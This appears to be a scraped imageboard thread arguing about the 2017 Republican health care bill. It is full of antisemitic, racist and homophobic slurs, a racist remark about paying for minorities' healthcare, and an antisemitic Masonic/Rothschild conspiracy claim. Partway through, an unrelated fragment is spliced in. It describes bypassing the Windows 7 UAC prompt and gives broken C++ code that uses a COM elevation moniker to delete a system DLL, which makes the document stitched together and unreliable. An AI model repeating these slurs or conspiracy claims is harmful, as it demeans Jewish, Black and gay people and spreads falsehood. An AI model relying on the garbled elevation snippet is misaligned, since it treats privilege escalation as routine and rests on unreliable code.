
How do you feel about Obamacare 2.0? How do you feel knowing the GOP were always full of shit in opposing Obamacare? How do you feel Trump's not pushing for single payer?

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>Implying Trump's precidency is about politics.

We don't give a shit what legislation is passed. As long as he pisses of the MSM and leftist cucks Trump's doing his job.

Ryan is a traitor kike.

Dead on arrival my senator wont allow it to pass the senate. Thank you Mike Lee.

>Dead on arrival my senator wont allow it to pass the senate. Thank you Mike Lee.

That doesn't mean it's dead on arrival idiot when it can pass though reconciliation with 50 votes.

>Implying Trump's precidency is about politics.
this makes sense

Trump is pretending to like Ryans then hes going to jump on Rand Pauls bill while making fun of Ryan for writing TPP.

>Trump is pretending to like Ryans then hes going to jump on Rand Pauls bill while making fun of Ryan for writing TPP.

What is the color of your sky color in your reality

Maybe people dont want to pay for the healthcare of blacks/hispanics/indians

Lee, Paul, and Cruz already promised to vote against it. It is already dead.

I'm behind on trumpcare. Someone give me the deets on what has changed

>Cruz already promised to vote against it.

Citation needed.


Execute any function with administrative privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative privileges


HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);

void ElevatedDelete()

// This is only availabe on Vista and higher
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);


Don't care if it upsets progressives.

Has anyone really seen the whole thing and read through it in detail? I can't really form a judgment until I see it myself. I don't trust the talking heads and other politicians to form an opinion for me. Everyone needs to remember that these are all still politicians and even ones you like do play games.

>I can't really form a judgment until I see it myself.

Read it faggot. Do it now!


Didn't realize they let it out already. Hadn't bothered keeping up with anything in a few days.

So you all commenting one way or the other on here have read all 123 pages?

If you have, what are some highlights? The ones you like and the ones you dislike.

>So you all commenting one way or the other on here have read all 123 pages?

>what is summaries?

>If you have, what are some highlights?

And what's the other side of the arguments look like? That's fairly one sided and includes quite a bit of speculation. Reads like something from CNN.

There is a huge divide within the republican party on this. You can tell from how the Right wing media is trying to seperate Trump's name from it. BreitBart is even referring to it as "Ryancare", which is a huge tell, indicating that if the plan blows up, they're trying give Trump an "out" per say.

If DT cannot sell this, it's gonna look real bad on the republicans. All the phase 2 and phase 3 crap, was the same shit the Obama administration was saying with the ACA.

I'd just call it what it really is, republicare. Since it is extremely unlikely that a single democrat will vote for it (and rightfully so, they were completely barred from any say in it), the republicans have to rely on their own base to push this through. In that sense, they own it, and if they fuck it up, it's on them.

>And what's the other side of the arguments look like?

>You can tell from how the Right wing media is trying to seperate Trump's name from it.

How does right wing media explain to their base Trump wants it passed?

He wants it passed, for now....

The thing is, the ball is in Trump's court to sell it to all the other die-hard conservatives and medicaid expansion republicans. If he can't garner their votes, then the bill won't pass the house, and it will be a failure on Trump's part to selling it. It is why the whole Trump administration is out talking in favor for it. Hell, he's having Ted Cruz for dinner this week, and several conservative house republicans for dinner next tuesday.


Buh buh we like the people can get coverage with pre existing conditions part...and the people can stay on their parents plan till 26 part....we just don't like the fact that that part costs money

Attention everyone we will do all those great things but it won't cost more!!!

Wait it it turns out money doesn't grow on trees sorries


Obama is the devil Trump rulz

How very informative and thorough.

The career politicians want desperately to please their insurance industry donors. It's doubtful that they'd let Trump's actual vision of a good plan pass through Congress. The industry wants to maintain their monopolies, after all. This bill may be the initial compromise they usually go through.

I'll have to finish reading this whole thing. One-sided summaries aren't usually correct no matter which side is doing the summarizing.

Thanks for the link.

>BreitBart is even referring to it as "Ryancare"

is that for real?

its upsetting moderate republicans, who want to protect medicaid. and the conservative wing, who want a full repeal

Seriously. Open up the markets so that insurance can be bought from anyone, anywhere in the country. Of course, you'd have to make sure your preferred doctor accepts the plan you're looking at buying, but you'd have actual competition within the industry which benefits consumers. Unfortunately, the insurance industry will fight tooth and nail. This is a hill they feel is worth dying on.

the issue never was socialized healthcare, but the way it was accomplished enabling the insurancecompanies to increase prices by a few 100% by getting rid of competition

Yup, read down the article, if you can hold back lunch. They are trying to stay objective on it, to give the impression that Trump supports it, for now. State-run media at its best (worst?)


shit wrong pic

KEK. That's quite a difference in pics.

I love watching Sup Forums realize how much trump is going to fuck over his base in real time


>be 22 male
>plan covering everything I need costs $140
>be 24 male
>Obongocare comes out
>my plan skyrockets to $445 and forces me to add women shit to my plan
>have no choice because if I don't pay for vaginal exams to be part of my plan I get a tax fine
>pay more unto now useless insurance than into my home

Oh please. He's going to have to make concessions to get anything done, but he's already well on his way to fulfilling everything he promised. Considering that most politicians are a flat 0%, anything above that will be considered a success.

Keep shilling.

Yeah, I can empathize with them, but I will not sympathize for them. As someone with pre-existing conditions, I understand that my premiums will definitely go up if this bill is passed, and that is why I didn't vote for Trump.

However, for the same people that voted for him in my position, and more, their premiums will also go up. Now they are pissed, because "Trump and the republicans said they could make it better!!" Ignorance is not an excuse anymore. You get what you vote for, so suck it up (Trump voters).

>told us they'd repeal and replace
>instead the rename and renew

You known you can stay on your parents plan till your 26, right? Why are you paying for your own healthcare at 22 and 24? Pretty sure you're trolling just to discredit the ACA (which is what most people here do, so makes sense).

You won't have competition. You will have collusion so they can all gouge the fuck out of everyone.

Saying competition between insurance companies will fix anything is like saying having competition between banks will get people more money. They all have identical profit to risk ratios, they all work with the same financial groups. Insurance company A isn't going to give a guy who smoked for 50 years a different rate than B will. Just like someone with bad credit cant get a loan from one bank and get one from another.

Sure there will be minor differences, but suggesting competition is going to solve anything is a pipe dream.

wtf nigger

Not everyone is a leech you faggot

Fuck conservatives I want healthcare.

Yeah. You're lying.


See pic related?

The freemasonic cabals cycle through countries about once every hundred years. When the debt bubbles reach an apex, they crash the system and move on to the next country.

Trump is pretending to be on your side by "taking down the deep state" but really what he is doing is collapsing America on behalf of the usury / masonic cabal so that the parasite can move on to a new host.

It's in his slogan. Everything politicians say is always opposite of what they mean. "Make America Great Again" means "Bring America down."

Why do you think all his advisors come from Council for National Policy funded by Rothschilds? He is doing their bidding. You just don't see the big picture.

Someone needs more experience in the healthcare industry.

You guys are shilling really hard today. Seriously, don't blow a gasket.

Lol ok

How long will you stay cucked?

Fuck you pay for your healthcare.

>How do you feel Trump's not pushing for single payer?

>Implying that I give a fuck about some fucking welfare legislation in America.
If anything it's good propaganda to cozy the normies here up to him

How long will it take for you to grow up?

If you think there's a chance Cruz is going to vote for RINOcare you're the dumbest person on Sup Forums right now. Or just about.

>Reads like something from CNN.
Can you not even read the source written at the bottom? It's Think Progress.